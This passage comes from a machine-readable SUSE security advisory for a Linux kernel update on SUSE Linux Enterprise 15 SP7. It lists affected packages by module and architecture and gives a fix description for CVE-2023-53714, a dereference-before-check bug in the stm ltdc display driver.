"name": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-ha:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product_id": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-we:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "kernel-default-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "kernel-default-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-default-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-default-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64"
},
"product_reference": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le"
},
"product_reference": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64"
},
"product_reference": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.4.0-150700.53.31.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch"
},
"product_reference": "kernel-devel-6.4.0-150700.53.31.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.4.0-150700.53.31.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch"
},
"product_reference": "kernel-macros-6.4.0-150700.53.31.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-6.4.0-150700.53.31.1.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch"
},
"product_reference": "kernel-docs-6.4.0-150700.53.31.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.4.0-150700.53.31.1.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch"
},
"product_reference": "kernel-source-6.4.0-150700.53.31.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "kernel-syms-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-syms-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-syms-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise Module for Legacy 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Legacy 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Module for Legacy 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Legacy 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Module for Legacy 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Legacy 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Module for Legacy 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Legacy 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64"
},
"product_reference": "ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le"
},
"product_reference": "ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x"
},
"product_reference": "ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 15 SP7",
"product_id": "SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.4.0-150700.53.31.1.x86_64 as component of SUSE Linux Enterprise Workstation Extension 15 SP7",
"product_id": "SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
},
"product_reference": "kernel-default-extra-6.4.0-150700.53.31.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Workstation Extension 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-53714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53714"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/stm: ltdc: fix late dereference check\n\nIn ltdc_crtc_set_crc_source(), struct drm_crtc was dereferenced in a\ncontainer_of() before the pointer check. This could cause a kernel panic.\n\nFix this smatch warning:\ndrivers/gpu/drm/stm/ltdc.c:1124 ltdc_crtc_set_crc_source() warn: variable dereferenced before check \u0027crtc\u0027 (see line 1119)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
